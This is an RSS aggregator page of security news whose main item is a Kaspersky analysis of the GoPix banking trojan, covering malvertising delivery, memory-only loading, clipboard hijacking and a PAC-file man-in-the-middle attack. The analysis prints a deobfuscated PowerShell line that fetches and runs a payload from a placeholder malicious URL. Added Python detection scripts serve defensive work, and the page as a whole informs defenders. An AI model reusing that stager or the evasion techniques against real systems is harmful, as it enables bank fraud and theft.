RSS Aggregator

⚡ Weekly Recap: Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Agents & More

The Hacker News - 7 hours 5 min ago
Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling. This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast. A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness,
Category: Hacking & Security

Shadow AI is everywhere. Here’s how to find and secure it.

Bleeping Computer - 7 hours 1 min ago
Shadow AI is quietly spreading across SaaS environments as employees adopt new AI tools without IT oversight. Nudge Security explains how security teams can discover AI apps, monitor usage, and govern risky AI activity. [...]
Category: Hacking & Security

The rugged Panasonic Toughbook laptop is finally changing after many years. You will still recognize it at first glance

Živě.cz - 7 hours 37 min ago
The new Toughbook 56 has a 16:10 aspect-ratio display for the first time. • For the first time in this rugged series, the lid also opens easily. • The Toughbook also attracts with performance, high brightness and fast networking.
Category: IT News

Technology can track people by how they disturb Wi-Fi signals

AbcLinuxu [news] - 7 hours 54 min ago
Researchers at La Sapienza University in Rome have developed a system that can identify individuals solely by how they disturb Wi-Fi signals. The authors named this new technology WhoFi. Unlike traditional biometric systems such as fingerprint scanners and facial recognition, this method requires neither direct physical contact nor visual input. WhoFi can also track individuals over a larger area than a fixed-position camera; all it needs is an available Wi-Fi network.
Category: GNU/Linux & BSD

Microsoft pulls Samsung app blocking Windows C: drive from Store

Bleeping Computer - 8 hours 7 min ago
Microsoft has removed the Samsung Galaxy Connect app from the Microsoft Store because it was causing issues on specific Samsung Galaxy Book 4 and desktop models running Windows 11. [...]
Category: Hacking & Security

Flaw in UK's corporate registry let directors rummage through rival records

The Register - Anti-Virus - 9 hours 4 min ago
Back button blunder in WebFiling service run by Companies House revealed confidential paperwork

Companies House was forced to pull down its record-filing platform for the entire weekend to rectify a "security issue" that exposed the personal details of company directors and other data to any logged-in users.…

Category: Viruses & Worms

Microsoft’s Patch Tuesday updates: Keeping up with the latest fixes

Computerworld.com [Hacking News] - 9 hours 10 min ago

Long before Taco Tuesday became part of the pop-culture vernacular, Tuesdays were synonymous with security — and for anyone in the tech world, they still are. Patch Tuesday, as you most likely know, refers to the day each month when Microsoft releases security updates and patches for its software products — everything from Windows to Office to SQL Server, developer tools to browsers.

The practice, which happens on the second Tuesday of the month, was initiated to streamline the patch distribution process and make it easier for users and IT system administrators to manage updates. Like tacos, Patch Tuesday is here to stay.

In a blog post celebrating the 20th anniversary of Patch Tuesday, the Microsoft Security Response Center wrote: “The concept of Patch Tuesday was conceived and implemented in 2003. Before this unified approach, our security updates were sporadic, posing significant challenges for IT professionals and organizations in deploying critical patches in a timely manner.”

Patch Tuesday will continue to be an “important part of our strategy to keep users secure,” Microsoft said, adding that it’s now an important part of the cybersecurity industry. As a case in point, Adobe, among others, follows a similar patch cadence.

Patch Tuesday coverage has also long been a staple of Computerworld’s commitment to provide critical information to the IT industry. That’s why we’ve gathered together this collection of recent patches, a rolling list we’ll keep updated each month.

In case you missed a recent Patch Tuesday announcement, here are the latest six months of updates.

For March, Patch Tuesday delivers fixes for 83 vulnerabilities

Microsoft’s March Patch Tuesday release addresses 83 vulnerabilities across Windows, Office, SQL Server, Azure, and .NET — with two publicly disclosed zero-days affecting SQL Server and .NET (though neither is being actively exploited in the wild). Six additional vulnerabilities, spanning the Windows Kernel, Graphics Component, SMB Server, Accessibility Infrastructure, and Winlogon, are flagged as “Exploitation More Likely.”

The most significant change this month is the introduction of Common Log File System (CLFS) hardening with signature verification, which will affect how Windows handles log files across the operating system. More info on Microsoft Security updates for March 2025.

February’s Patch Tuesday release fixes 59 flaws, including 6 being exploited

The company’s Patch Tuesday release for February addresses 59 CVEs across the company’s product family — roughly half the volume of January’s 159 patches. Six vulnerabilities, affecting Windows Shell, MSHTML, Desktop Window Manager, Remote Desktop, Remote Access, and Microsoft Word, are already being actively exploited. (All five Critical-rated CVEs target Azure services rather than Windows, however.)

Both Windows and Office get a “Patch Now” recommendation, with CISA setting a March 3 enforcement deadline for all six exploited vulnerabilities. Two new enforcement timelines also take effect in April: Kerberos RC4 deprecation (CVE-2026-20833) and Windows Deployment Services hardening (CVE-2026-0386). More info on Microsoft Security updates for February 2026.

For January, Patch Tuesday starts off with a bang

The first Patch Tuesday release of 2026 addresses 112 CVEs across Microsoft’s product portfolio, including eight rated critical and three zero-day vulnerabilities. One zero-day (CVE-2026-20805), an information disclosure flaw in the Desktop Window Manager, is already under active exploitation, prompting CISA to add it to the Known Exploited Vulnerabilities catalog with a remediation deadline of Feb. 3, 2026. (Note: 95 of the vulnerabilities affect Windows.) More info on Microsoft Security updates for January 2025.

Ho ho ho! December’s Patch Tuesday delivers three zero-days

The December Patch Tuesday update addresses three zero-days (CVE-2025-64671, CVE-2025-54100, and CVE-2025-62221) but includes surprisingly few total patches (just 57). Notably, Microsoft has not published any critical updates for the Windows platform this month. That said, given the zero-days, we recommend a “Patch Now” release schedule for Windows and Microsoft Office. More info on Microsoft Security updates for December 2025.

Be thankful: November’s Patch Tuesday has just one zero-day

This November Patch Tuesday release offers a much reduced set of updates, with just 63 Microsoft patches and (only) one zero-day (CVE-2025-62215) affecting the Windows desktop platform. Windows desktops this month require a “Patch Now” plan, and while the severity of these security vulnerabilities is less than it was in October, the testing requirements are still extensive. More info on Microsoft Security updates for November 2025.

For October’s Patch Tuesday, a scary number of fixes

Microsoft this week released 175 updates affecting Windows and Office and .NET, including server-based updates for Microsoft SQL Server and Exchange server. There are also four zero-day fixes (CVE-2025-24052, CVE-2025-24990, CVE-2025-2884 and CVE-2025-59230), leading to a “Patch Now” recommendation for Windows.

General support for Windows 10 ended Oct. 14, with Microsoft advising: “At this point technical assistance, feature updates and security updates are no longer provided. If you have devices running Windows 10, we recommend upgrading them to Windows 11.” More info on Microsoft Security updates for October 2025.

Category: Hacking & Security

Why Security Validation Is Becoming Agentic

The Hacker News - 9 hours 24 min ago
If you run security at any reasonably complex organization, your validation stack probably looks something like this: a BAS tool in one corner. A pentest engagement, or maybe an automated pentesting product, in another. A vulnerability scanner feeding an attack surface management platform somewhere else. Each tool gives you a slice of the picture. None of them talks to each other in any
Category: Hacking & Security

AI will work in the user's place. Copilot Cowork is Microsoft's best attempt yet to sell artificial intelligence to businesses

Živě.cz - 9 hours 37 min ago
Microsoft is launching Copilot Cowork, built on Claude Cowork technology. • The agentic AI has access to e-mails, calendar, documents and chats. • This AI no longer just advises; it actually works and produces results at the user's request.
Category: IT News

ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers

The Hacker News - 9 hours 1 min ago
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. "Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running
Category: Hacking & Security

Amazon finds out AI programming isn’t all it’s cracked up to be

Computerworld.com [Hacking News] - 9 hours 50 min ago

Businesses love that they can use AI to replace those pesky, expensive developers. For example, Atlassian just laid off 10% of its workers, about 1,600 jobs, to throw more money into AI. Block (formerly Square) CEO Jack Dorsey recently announced he was cutting 4,000 jobs, almost 40% of the company’s staff, saying the intelligence tools we’re creating and using … “are enabling a new way of working which fundamentally changes what it means to build and run a company.”

New? I think not. Businesses have been firing people to become more profitable since Ea-nāṣir of Ur let his copper quality assurance engineer go.

What’s that — AI is different, you say? It really contributes to a business’s bottom line while maintaining high standards. But does it, really? Let’s check in over at Amazon to see how AI is working there.

First, Amazon, like so many other companies, is laying people off left and right — 30,000 so far in the last six months. “This generation of AI is the most transformative technology we’ve seen since the Internet, and it’s enabling companies to innovate much faster than ever before,” wrote Beth Galetti, Amazon’s senior vice president of People Experience and Technology. This means Amazon could “be organized more leanly.” 

In plain English, that means they’re firing people.

Amazon might yet regret that move. Multiple Amazon Web Services (AWS) and Amazon retail outages have prompted an internal crackdown on how generative AI (genAI) is allowed to touch production code. What’s that line about the horse and the barn door?

It started in mid‑December, when an internal AWS AI coding agent called Kiro was allowed to make live changes to a customer‑facing cost management system. Kiro decided the best fix was to “delete and recreate the environment,” triggering a roughly 13‑hour outage that hit the AWS Cost Explorer service in parts of mainland China.

Amazon has insisted the root cause was “user error” and misconfigured access controls. They argued that the same problem could have happened with any developer tool, not just AI. Internally, AWS characterized the disruption as “extremely limited,” stressing that core compute, storage, database, and AI services were not affected.

That could be true. People have been making mistakes and writing sloppy code long before AI got into the programming mix. 

But (surprise!) the December failure wasn’t an isolated case. There have been at least two production outages in recent months, where Amazon AI coding tools can take some of the blame. Internally, those outages were described as “small but entirely foreseeable.”

The root cause was that AI was effectively treated as an extension of a human operator and granted operator‑level permissions. That’s just stupid. You never give someone — or something — system administration privileges unless they absolutely need it and you completely trust them. Neither was true in this case. So it was this combination of high privileges and no supervision that blew up.

Amazon insists it was human error. Yes, it was. The error was humans putting too much trust in AI. This will only happen more and more often as we replace people who know what they’re doing with often clueless AI agents and bots.

But, wait! There’s more. AI failures have spread beyond AWS infrastructure to Amazon’s retail storefront. In early March, multiple AI-assisted blunders resulted in four — count ’em four! — major incidents. One led to a six-hour outage.

Amazon had had enough. Amazon Senior Vice President Dave Treadwell acknowledged that “GenAI tools supplement or accelerate production change instructions, leading to unsafe practices.” Why? Amazon AI safeguards “are not yet fully established.”

You know, maybe it’s just me, but before firing a ton of people, I’d make sure that 1) AI could do their jobs and 2) I had a way of ensuring that I could spot, track, and repair AI errors before things go awry. You know, safeguards.

For now, Amazon has a new AI rule for the next 90 days: junior and mid-level engineers now need senior sign-off on any AI-assisted production changes. They’ll also be resetting their code practices and re‑emphasizing traditional safeguards. Engineers in the e‑commerce group have been told to attend normally optional weekly meetings focused on recent outages and new rules around generative‑AI‑driven deployments.

Publicly, Amazon has pushed back against the narrative that AI agents themselves “caused” the outages. Instead, it has been reframing these failures as classic access-control and process failures. Company spokespeople have repeatedly said the incidents were user error and coincidence, stressing that they have “no evidence” that AI tools make mistakes more often than traditional software developers.

Amazon’s top brass is missing the point. Of course, humans must take the blame. If Amazon executives had a clue, they might recall that back in 1979, an IBM training manual stated, “A computer can never be held accountable, therefore a computer must never make a management decision.” Unfortunately, from the top down, Amazon is insisting that AI be used even when, as has become apparent, it doesn’t work that well.

Amazon’s engineers know that. They’ve told The Guardian that they must use AI and “that we have to go faster, this will make us go faster, and that speed is the number one priority.” The result, according to another Amazon employee, is: “This pressure to use [AI] has resulted in worse quality code, but also just more work for everyone.”

How does the saying go? Oh yeah, “You can have two out of three: fast, cheap, or good.” For Amazon AI may be fast and cheap, but it’s failing to be good. 

To get true productivity out of AI, you need to double and triple check its work. This is a lesson that not only Amazon needs to learn, but all businesses suffering from the hallucination that AI is ready to replace programmers. 

It’s not. It’s that simple.

Category: Hacking & Security

The first liquid-fuel rocket launched a hundred years ago. Compared with modern launchers, Nell had an inverted design

Živě.cz - 9 hours 56 min ago
While the history of solid-fuel rockets goes back to medieval 13th-century China, liquid propulsion is much younger. Today marks exactly one hundred years since the first flight of Nell, a device running on liquid oxygen and gasoline. It was built by rocket pioneer Robert H. Goddard and first took off on March 16, 1926, from a farm ...
Category: IT News

Free real estate: GoPix, the banking Trojan living off your memory

Kaspersky Securelist - 10 hours 22 min ago

Introduction

GoPix is an advanced persistent threat targeting Brazilian financial institutions’ customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions’ customers.

Our extensive analysis reveals GoPix’s capabilities to execute man-in-the-middle attacks, monitor Pix transactions, Boleto slips, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.

GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It’s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.

The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims: financial bodies of state governments and large corporations.

The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix’s ability to evade traditional security defenses and steal and manipulate sensitive financial data.

The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.

Initial infection

Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.

We have been monitoring this threat since 2023, and it continues to be very active for the time being.

GoPix malware campaign detections

The initial infection vector is shown below:

Initial infection vector

When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.

Website shown if the user is detected as a bot or sandbox

However, if the victim passes the bot check, the malicious website will query the check.php endpoint, which will then return a JSON response with two URLs:

JSON response from a malicious endpoint

The victim will then be presented with a fake webpage offering to download the advertised software, in this case the malicious “WhatsApp Web installer”. To decide which URL the victim will be redirected to, another check happens in the JavaScript code: whether port 27275 is open on localhost.

WebSocket request to check if the port is open

This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url), which offers to download a fake WhatsApp executable NSIS installer.
At first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.

Malware delivered through a malicious website

Infection chain

First-stage payload

If no Avast solution is installed, an executable NSIS installer file is delivered to the victim’s device. The attackers change this installer frequently to avoid detection. It’s digitally signed with a stolen code signing certificate issued to “PLK Management Limited”, also used to sign the legitimate “Driver Easy Pro” software.

Stolen certificate used to sign the malicious installer

The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.

NSIS installer code creating a batch file

However, if port 27275 is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.

Obfuscated command line inside the LNK

Deobfuscated command line:

WindowsPowerShell\v1.0\powershell (New-Object Net.WebClient).UploadString("http://MALICIOUS/1/","tHSb")|$env:E -

The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.

It’s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.

Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it’s defined as “PowerShell Script”).

GoPix delivery chain

Initial PowerShell script

This script’s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim’s computer.

System information collection

The information contained within this JSON is as follows:

  • Folder and file names to be created under the %APPDATA% directory
  • Obfuscated PowerShell script
  • Encrypted PowerShell script ps
  • Malicious code implant sc containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant
  • GoPix configuration file pf

Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script.

PSExecutionPolicyPreference=Unrestricted powershell -File "$scriptPath" exit

Obfuscated PowerShell script

Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script ps, starts another PowerShell instance, and passes the decrypted script through its stdin, so that the decrypted script is never loaded to disk.
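The delivery chain described above (an LNK or NSIS-dropped batch file starting PowerShell with an inline WebClient string fetch, a batch file running a script dropped under %APPDATA%, and PowerShell spawning a second PowerShell that reads its script from stdin) leaves three distinct process-creation patterns that a SOC can match. The following detection logic is an added example, not Kaspersky's code: it runs three rules over constructed Sysmon-style process events. The PIDs, paths and URL in the sample events are made up for the demo and are not GoPix indicators.

```python
import re

# Constructed process-creation events in a Sysmon EID 1 / Windows 4688 style.
# PIDs, paths and the URL are invented for this demo; they are not GoPix IoCs.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 5012, "image": PS_EXE, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell (New-Object Net.WebClient).UploadString("http://example.invalid/1/","x")|$env:E -'},
    {"pid": 5100, "image": PS_EXE, "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell -File "C:\Users\u\AppData\Roaming\Updater\run.ps1"'},
    {"pid": 5130, "image": PS_EXE, "parent_image": PS_EXE,
     "cmdline": "powershell -"},
    {"pid": 6000, "image": PS_EXE, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -NoProfile -Command Get-Process"},
]


def is_powershell(image):
    """True when the image file name is a PowerShell host binary."""
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def rule_webclient_string_fetch(event):
    # Stage one: WebClient.UploadString/DownloadString invoked straight from the command line.
    return is_powershell(event["image"]) and bool(re.search(
        r"net\.webclient\)\s*\.\s*(upload|download)string\s*\(", event["cmdline"], re.I))


def rule_script_file_in_appdata(event):
    # Stage two: -File pointing at a script dropped under %APPDATA% (AppData\Roaming).
    return is_powershell(event["image"]) and bool(re.search(
        r"-file\s+\"?[^\"\s]*\\appdata\\roaming\\", event["cmdline"], re.I))


def rule_script_via_stdin(event):
    # Memory-only stage: PowerShell spawning PowerShell with the script fed on stdin ("-").
    return (is_powershell(event["image"]) and is_powershell(event["parent_image"])
            and re.search(r"\s-\s*$", event["cmdline"]) is not None)


RULES = {
    "ps_webclient_string_fetch": rule_webclient_string_fetch,
    "ps_file_in_appdata": rule_script_file_in_appdata,
    "ps_script_via_stdin": rule_script_via_stdin,
}


def evaluate(events):
    """Return (pid, rule_name) pairs for every event that trips a rule."""
    hits = []
    for event in events:
        for name, rule in RULES.items():
            if rule(event):
                hits.append((event["pid"], name))
    return hits


if __name__ == "__main__":
    for pid, rule_name in evaluate(SAMPLE_EVENTS):
        print("pid %d matched %s" % (pid, rule_name))
```

Each rule alone will also fire on some legitimate automation (the stdin pattern in particular), so in a real deployment they are best correlated by parent/child chain within a short window; the benign `Get-Process` event in the sample is there to show that ordinary PowerShell use does not trip any of them.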

Deobfuscated PowerShell script

Decrypted PowerShell script “ps”

The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted.

PowerShell script shellcode jumps to the malware loader shellcode

The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim’s computer.

Building the GoPix shellcode depending on the targeted architecture

Shellcode

This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We’ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash.

The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique

The first time GoPix is dropped into memory through PowerShell, its structure is as follows:

  1. Memory dropper shellcode
  2. Memory dropper DLL
  3. Main payload shellcode
  4. Main payload DLL

Both DLLs have their MZ signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory.

MZ signature zeroed
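A memory scanner that keys only on the two MZ bytes misses images prepared the way described above. The scanner below is an added example (not Kaspersky's tooling): it treats every 4-byte-aligned offset as a candidate DOS header, follows the e_lfanew field at +0x3C and validates the PE/COFF header it points at, so a zeroed MZ signature is reported but never required. The sample image it scans is a constructed, minimal PE-shaped blob, not a real executable.

```python
import struct

PE_SIGNATURE = b"PE\x00\x00"
KNOWN_MACHINES = {0x014C, 0x8664, 0x01C4, 0xAA64}   # i386, x64, ARM Thumb-2, ARM64
OPTIONAL_MAGIC = {0x10B, 0x20B}                     # PE32, PE32+


def find_pe_images(buf, max_e_lfanew=0x1000):
    """Locate PE images in a memory region without trusting the MZ bytes.

    Every 4-byte aligned offset is treated as a possible DOS header: the dword at
    +0x3C (e_lfanew) must point at a plausible PE/COFF header inside the buffer.
    The MZ signature is only reported, never required, so an image whose first
    two bytes were zeroed is still found.
    """
    hits = []
    n = len(buf)
    for base in range(0, n - 0x40, 4):
        e_lfanew = struct.unpack_from("<I", buf, base + 0x3C)[0]
        if e_lfanew < 0x40 or e_lfanew > max_e_lfanew:
            continue
        pe = base + e_lfanew
        if pe + 26 > n or buf[pe:pe + 4] != PE_SIGNATURE:
            continue
        machine, num_sections = struct.unpack_from("<HH", buf, pe + 4)
        size_of_optional = struct.unpack_from("<H", buf, pe + 20)[0]
        magic = struct.unpack_from("<H", buf, pe + 24)[0]
        if (machine not in KNOWN_MACHINES or not 1 <= num_sections <= 96
                or size_of_optional < 2 or magic not in OPTIONAL_MAGIC):
            continue
        hits.append({
            "offset": base,
            "pe_offset": pe,
            "machine": machine,
            "sections": num_sections,
            "pe32plus": magic == 0x20B,
            "mz_present": buf[base:base + 2] == b"MZ",
        })
    return hits


def make_sample_image(zero_mz):
    """Build a constructed, minimal PE-shaped blob for the demo (not a real executable)."""
    dos = bytearray(0x80)
    if not zero_mz:
        dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                # e_lfanew -> COFF header
    coff = struct.pack("<4sHHIIIHH", PE_SIGNATURE, 0x8664, 2, 0, 0, 0, 0xF0, 0x2022)
    optional = struct.pack("<H", 0x20B) + bytes(0xF0 - 2)  # PE32+ magic, rest zeroed
    return bytes(dos) + coff + optional + bytes(0x100)


if __name__ == "__main__":
    region = bytes(0x200) + make_sample_image(zero_mz=True)
    for hit in find_pe_images(region):
        print("PE image at 0x%X (MZ present: %s, PE32+: %s, sections: %d)"
              % (hit["offset"], hit["mz_present"], hit["pe32plus"], hit["sections"]))
```

On a real dump the candidate count is large, so the header sanity checks (machine type, section count, optional-header magic) are what keep false positives down; a hit with `mz_present` false in a process such as a browser is exactly the artifact the text describes and is worth carving out for further analysis.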

GoPix dropper

When the main function from the dropper is called, it verifies if it is running within an Explorer.exe process; if not, it will terminate. It then sequentially checks for installed browsers — Chrome, Firefox, Edge, and Opera — retrieving the full path of the first detected browser from the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm.

After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported main function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of Explorer.exe.

The dropper uses a syscall instruction and calls the GoPix in-memory implant’s main function

Main GoPix implant

Clipboard stealing functionality

Boleto bancário was added as one of the targets to the malware’s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is “23790.12345 60000.123456 78901.234567 8 76540000010000”.

Boleto bancário targeted in clipboard-stealing functionality

When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor.

Unique man-in-the-middle attack

PAC (Proxy AutoConfig) files are nothing new; they’ve been used by Brazilian criminals for over two decades, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website.

In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the host field of the PAC file. It is formatted on the fly using a pf configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers’ CRC checksums. If it doesn’t match a known browser, the malware simply terminates the connection.

PAC file excerpt
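Because the PAC file and the proxy compare checksums rather than names, the target list can be recovered by hashing candidate hostnames and looking for collisions with the hardcoded values, which is the approach the next paragraph describes. The script below is an added example, not Kaspersky's tooling: it implements standard CRC32 (via zlib) for the PAC host check and a table-based CRC32C (the variant the proxy applies to the client process name), and resolves a list of hardcoded hashes against a candidate list. The hardcoded values are the ones listed in the table below; the candidate hostnames other than "local" are constructed placeholders, and the browser executable names are assumptions for the demo.

```python
import zlib

# Hashes hardcoded in the GoPix PAC file, taken from the table in the analysis.
GOPIX_PAC_CRC32 = ["8BD688E8", "8CA8ACFF", "AD8F5213", "105A3F17", "B477FE70",
                   "785F39C2", "C72C8593", "75E3C3BA", "FD4E6024"]

# Constructed candidate list for the demo; a real hunt feeds in a broad list of
# bank hostnames. "local" is the one value the analysis resolves outright.
CANDIDATE_HOSTS = ["local", "www2.example-bank.com.br", "internetbanking.example.gov.br"]


def crc32(data):
    """Standard CRC32 (zlib / IEEE 802.3), the variant used for PAC host matching."""
    return zlib.crc32(data) & 0xFFFFFFFF


def _make_reflected_table(poly):
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ poly if c & 1 else c >> 1
        table.append(c)
    return table


_CRC32C_TABLE = _make_reflected_table(0x82F63B78)  # reflected Castagnoli polynomial


def crc32c(data):
    """CRC32C (Castagnoli), the variant the proxy applies to the client process name."""
    crc = 0xFFFFFFFF
    for b in data:
        crc = _CRC32C_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def to_hex(value):
    return "%08X" % value


def resolve_hashes(hardcoded, candidates, hashfn=crc32):
    """Map each hardcoded hex hash to the candidate that produces it (None if unresolved)."""
    resolved = {h.upper(): None for h in hardcoded}
    for name in candidates:
        digest = to_hex(hashfn(name.encode("ascii")))
        if digest in resolved:
            resolved[digest] = name
    return resolved


def browser_name_hashes(process_names):
    """CRC32C of browser executable names, to compare with values pulled from a sample."""
    return {to_hex(crc32c(n.encode("ascii"))): n for n in process_names}


if __name__ == "__main__":
    for digest, host in resolve_hashes(GOPIX_PAC_CRC32, CANDIDATE_HOSTS).items():
        print(digest, host or "<unresolved>")
    # Assumed browser names; the sample's own allowlist would be read out of the binary.
    for digest, proc in browser_name_hashes(["chrome.exe", "firefox.exe",
                                             "msedge.exe", "opera.exe"]).items():
        print(digest, proc)
```

Run against a real candidate list, the unresolved entries tell you which targets your list does not yet cover; getting the CRC variant right matters, since CRC32 and CRC32C of the same string differ completely (the standard check strings "123456789" hash to CBF43926 and E3069283 respectively).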

To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target.

CRC32     Target
8BD688E8  local
8CA8ACFF  www2.banco********.com.br
AD8F5213  autoatendimento.********.com.br
105A3F17  www2.****.com.br
B477FE70  internetbanking.*******.gov.br
785F39C2  loginx.********.br
C72C8593  internetpf.*****.com.br
75E3C3BA  internet.*****.com.br
FD4E6024  internetbanking.*******.com.br

HTTPS interception

Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim’s machine. This allows the attacker to sniff and even manipulate the victim’s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027.

GoPix trusted root certificate

Conclusion

With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallet addresses.

This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware’s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers’ investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans.

For further information on GoPix and all technical details, please contact [email protected].

Kaspersky’s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix.

Indicators of compromise

EB0B4E35A2BA442821E28D617DD2DAA2 – NSIS installer
C64AE7C50394799CE02E97288A12FFF – ZIP archive with an LNK file
D3A17CB4CDBA724A0021F5076B33A103 – Malware dropper
28C314ACC587F1EA5C5666E935DB716C – Main payload

Malicious Certificate Thumbprint
